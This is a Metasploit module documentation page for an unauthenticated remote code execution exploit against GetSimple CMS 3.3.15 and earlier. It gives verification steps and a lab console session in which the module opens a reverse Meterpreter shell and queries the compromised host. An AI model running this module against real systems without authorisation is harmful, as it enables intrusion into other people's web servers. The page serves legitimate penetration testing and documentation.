metasploit-gs/documentation/modules/exploit/multi/http/getsimplecms_unauth_code_exec.md
2025-07-17 11:51:29 +01:00

Description

This module exploits a vulnerability in GetSimple CMS that allows unauthenticated attackers to perform remote code execution. An arbitrary file upload vulnerability can be triggered by an authenticated user; however, authentication can be bypassed by leaking the CMS API key to target the session manager.

Vulnerable Application

GetSimple CMS versions 3.3.15 and below

Vulnerable installations can be found here

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/http/getsimplecms_unauth_code_exec
  4. Do: set RHOSTS <IP>
  5. Do: run
  6. You should get a shell.

Scenarios

Tested on GetSimple CMS v3.3.15 on Ubuntu 18.04

msf > use exploit/multi/http/getsimplecms_unauth_code_exec
msf exploit(multi/http/getsimplecms_unauth_code_exec) > set rhosts 192.168.37.137
rhosts => 192.168.37.137
msf exploit(multi/http/getsimplecms_unauth_code_exec) > set verbose true
verbose => true
msf exploit(multi/http/getsimplecms_unauth_code_exec) > run

[*] Started reverse TCP handler on 192.168.37.1:4444
[*] GetSimpleCMS version 3315
[*] Sending stage (38247 bytes) to 192.168.37.137
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.137:32976) at 2019-05-16 11:22:39 -0500

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.18.0-16-generic #17~18.04.1-Ubuntu SMP Tue Feb 12 13:35:51 UTC 2019 x86_64
Meterpreter : php/linux
meterpreter >